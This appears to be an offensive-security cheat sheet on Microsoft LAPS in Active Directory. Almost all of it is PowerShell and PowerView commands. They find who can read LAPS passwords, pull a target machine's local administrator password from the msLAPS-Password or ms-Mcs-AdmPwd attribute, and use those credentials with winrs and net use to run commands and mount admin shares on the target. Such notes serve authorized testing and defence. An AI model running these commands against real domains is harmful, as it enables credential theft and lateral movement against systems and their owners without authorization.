laps

Provides centralized storage of local user passwords and periodically rotates passwords. Helps mitigate lateral movement by stopping reuse of passwords.

Powershell

[!INFO] Remember to follow the Powershell methodology

check if ms-mcs-admpwd attribute is visible with PowerView

Get-DomainComputer | Where-object -property ms-Mcs-AdmPwdExpirationTime | select-object samaccountname

Powerview

Find users who can read LAPS:

Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs | Where-Object {($_.ObjectAceType -like 'msLAPS-Password') -and ($_.ActiveDirectoryRights -match 'ReadProperty')} | ForEach-Object {$_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName $_.SecurityIdentifier);$_}

In Legacy Microsoft LAPS, the attribute would be ms-Mcs-AdmPwd in place of msLAPS-Password.

Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs | Where-Object {($_.ObjectAceType -like 'ms-Mcs-AdmPwd') -and ($_.ActiveDirectoryRights -match 'ReadProperty')} | ForEach-Object {$_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName $_.SecurityIdentifier);$_}

Read LAPS credential using PowerView:

Get-DomainObject -Identity <targetmachine$> | select -ExpandProperty msLAPS-Password
Get-DomainObject -Identity <targetmachine$> | select -ExpandProperty ms-mcs-admpwd

Read LAPS credential using ADModule:

Get-ADComputer -Identity <targetmachine$> -Properties ms-mcs-admpwd | select -ExpandProperty ms-mcs-admpwd

With the creds, you can then do:

winrs -r:<target-machine$> -u:.\Administrator -p:'$ubscr1beTo0xd4y' hostname
net use x: \\<target-machine$>\C$\Users\Public /user:notes\Administrator '$ubscr1beTo0xd4y'